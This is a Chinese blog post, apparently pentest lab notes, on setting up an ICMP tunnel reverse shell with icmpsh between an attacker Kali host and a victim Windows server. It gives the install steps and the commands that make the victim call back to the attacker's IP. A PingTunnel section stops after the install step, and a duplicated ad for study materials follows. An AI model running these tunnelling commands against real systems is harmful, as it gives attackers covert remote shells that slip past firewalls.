【渗透测试笔记】之【内网渗透——网络层隧道(icmpsh、PingTunnel的使用:icmp隧道反向shell(1)

最新推荐文章于 2024-07-20 16:46:53 发布
最新推荐文章于 2024-07-20 16:46:53 发布
阅读量235 收藏 5
点赞数 7
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84971029/article/details/138793933
版权
目录

1. ICMP隧道

1.1 icmpsh本地端口转发

实验环境:
kali(攻击机):192.168.8.48
Windows2012(受害机):192.168.8.18

1.1.1 下载与部署
kali(需要python2环境)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py
# 安装python2pip

git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
pip install .
# 安装python-impacket类库

sysctl -w net.ipv4.icmp_echo_ignore_all=1
# 关闭icmp应答,0为开启

git clone https://github.com/bdamele/icmpsh.git
# 下载icmpsh
1.1.2 使用方法
kali
cd icmpsh
python icmpsh_m.py 192.168.8.35(攻击者IP) 192.168.8.18(受害者IP)

在这里插入图片描述
此时会等待回连。

Windows2012
icmpsh.exe -t 192.168.8.35(攻击者IP) -d 500 -b 30 -s 128

参数说明:

-t:攻击者IP,必选
-r:用于测试
-d:请求延迟(毫秒)
-o:响应超时(毫秒)
-b:空格数限制
-s:字节最大数据缓冲区大小(以字节为单位)

在这里插入图片描述

1.1.3 效果演示

执行后成功回连:
在这里插入图片描述

1.2 PingTunnel本地端口转发

实验环境:
kali(攻击机):192.168.8.48
CentOS7(边界服务器,跳板机):192.168.8.35
Windows2012(内网服务器):10.1.1.10

1.2.1 下载与部署
kali

方式一:直接安装

apt install ptunnel -y

方式二:官网下载安装

apt install flex bison -y
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/d391c964d3a9969ac98d9ea73202a6e0.png)

![img](https://img-blog.csdnimg.cn/img_convert/ae67eb6d44971c03d0faf7325aa00521.png)

![img](https://img-blog.csdnimg.cn/img_convert/d5ed0e8849080c3fc1a33befef7e97cc.png)

![img](https://img-blog.csdnimg.cn/img_convert/d721426b19f9f2b0d4a1125e593065eb.png)

![img](https://img-blog.csdnimg.cn/img_convert/0b97416e74d80fe8a98b5623f700b72a.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84971029
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透—利用ICMP实现命令控制
weixin_41666796的博客
03-18 153
有时,网络管理员会使渗透测试人员的生活变得更加艰难。令人惊讶的是,其中一些确实将防火墙用于其用途!这些情况之一就是只允许流量进入已知的机器,端口和服务(入口过滤)并设置强大的出口访问控制列表。在这种情况下,当您拥有内部网络或DMZ的机器部分时(例如,在Citrix Breakout或类似活动中),通过TCP获得反向Shell而不考虑绑定Shell并不总是那么简单。 但是,使用UDP(通常是DNS隧道)或ICMP作为获取反向Shell通道呢?ICMP是此工具的重点。 https://github.com/b
内网渗透系列:内网隧道icmp_tran
闵行小鱼塘
04-10 6565
本文研究ICMP隧道的一个工具,icmp_tran
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 3002
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
内网渗透(二)——ICMP隧道搭建
qq_61562251的博客
12-10 628
ICMP隧道防⽕墙没有开放任何端⼝,但是icmp消息不使用端口号,而是通过IP头部中的协议字段来识别。在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。1、工具:pingtunnelimcptunnel可以将IP流量封装进ICMPping数据包中,旨在利用ping穿透防火墙的检测,因为通常防火墙是不会屏蔽ping数据包的。
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8012
icmp隧道的利用
渗透测试笔记】之【内网渗透——网络层隧道icmpshPingTunnel使用icmp隧道反向shell
2401_84971057的博客
05-13 189
python icmpsh_m.py 192.168.8.35(攻击者IP) 192.168.8.18(受害者IP)icmpsh.exe -t 192.168.8.35(攻击者IP) -d 500 -b 30 -s 128。-s:字节最大数据缓冲区大小(以字节为单位)-t:攻击者IP,必选。-d:请求延迟(毫秒)-o:响应超时(毫秒)方式二:官网下载安装。
渗透测试笔记】之【内网渗透——网络层隧道icmpshPingTunnel使用icmp隧道反向shell、本地端口转发)】
AA8j的博客
10-14 629
拓扑图 ICMP隧道 条件:能ping通主机。
内网渗透笔记——三层发现and四层发现
wang_zui_zui的博客
01-21 4006
三层发现(网络层) 最常用ping命令,但是如果防火墙一开,就无法ping到对方。三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户 fping -a 存活主机 -b 数据包大小 -f 从文件中读取ip(不能和-g同时使用) -l 循环ping -g 网段,开始-结束地址 -u 不可达,ping不通 图一没有设置范围,图二设置了扫描的开始地址和结束地址,如果没有设置范围,就默认从头.
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
Python之渗透测试笔记(五) ——Requests模块
12-21
Requests模块是Python编程中用于发送HTTP请求的重要第三方库,它为开发者提供了简洁、直观的接口,使得处理HTTP请求...无论是在Web开发、自动化测试还是渗透测试中,Requests都能极大地简化网络数据的获取和处理过程。
读书笔记之红蓝对抗解密渗透测试与网络安全建设.docx
03-27
读书笔记之红蓝对抗解密渗透测试与网络安全建设.docx
网络安全-渗透完整笔记
03-27
网络扫描是渗透测试的重要环节,包括基于UDP、ARP、NetBIOS、SNMP、ICMP、SMB等多种协议发现内网存活主机的方法。在攻击过程中,可能需要利用Web程序的敏感目录,或者通过Mysql、Sql server服务进行攻击,结合Sqlmap...
C语言复习(笔记加例题)第一章:数据类型及其运算
weixin_55021541的博客
07-17 1023
通常在其他编程语言中用作字符串的缩写,但在 C 语言中,字符串是通过字符数组char a[]来表示的。:以下哪个类型是 C 语言中用来存储布尔值的?:以下哪个类型是 C 语言中用来存储字符的?:以下哪个不是 C 语言中的基本数据类型?2. C 运算符的种类、运算优先级和结合性。3. 不同类型数据间的转换与运算。4. C 表达式的类型和求值规则。并不是一个基本数据类型。:A,在 C 语言中,
谷粒商城实战笔记-38-前端基础-Vue-指令-单向绑定&双向绑定
最新发布
epitomizelu的专栏
07-20 507
安全性v-text更安全,因为它总是将数据作为纯文本插入,不解析 HTML。v-html则可能引发安全问题,因为它会解析并渲染 HTML 标签。用途v-text适用于插入文本数据,而v-html适用于插入需要被解析为实际 HTML 的数据。处理 HTML 标签v-text忽略 HTML 标签,将其视为普通文本;v-html则会解析并显示 HTML 标签。二者都是单向绑定,元素绑定model,model不绑定元素,元素值改变时model值不会更新。
VSCODE驯服笔记(一)
敲代码的狸花猫
07-15 324
点击左下角的齿轮图标,然后选择 “Settings”。或者使用快捷键 Ctrl + ,(Windows/Linux)或 Cmd + ,(macOS)。
防御笔记第七天(时需更新)
weixin_63264424的博客
07-16 772
HRP在进行双机热备时,还有一个要求,两台热设备之间,必须拥有一条链路,用来同步信息,并且,这条链路必须是三层链路---这两条路在进行数据传输时,不受安全策略的影响,(注意,如果心跳线是直连的,则不受安全策略的影响,但是中间有中继设备,即非直连场景,则需要配置安全策略)----心跳线----VGMP发送的报文也是通过心跳线传输的。配置信息---(接口IP地址,路由地址)-----hrp不能同步基本的接口和路由信息,安全策略和NAT策略……状态信息-----会话表,server-map,黑名单和白名单等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值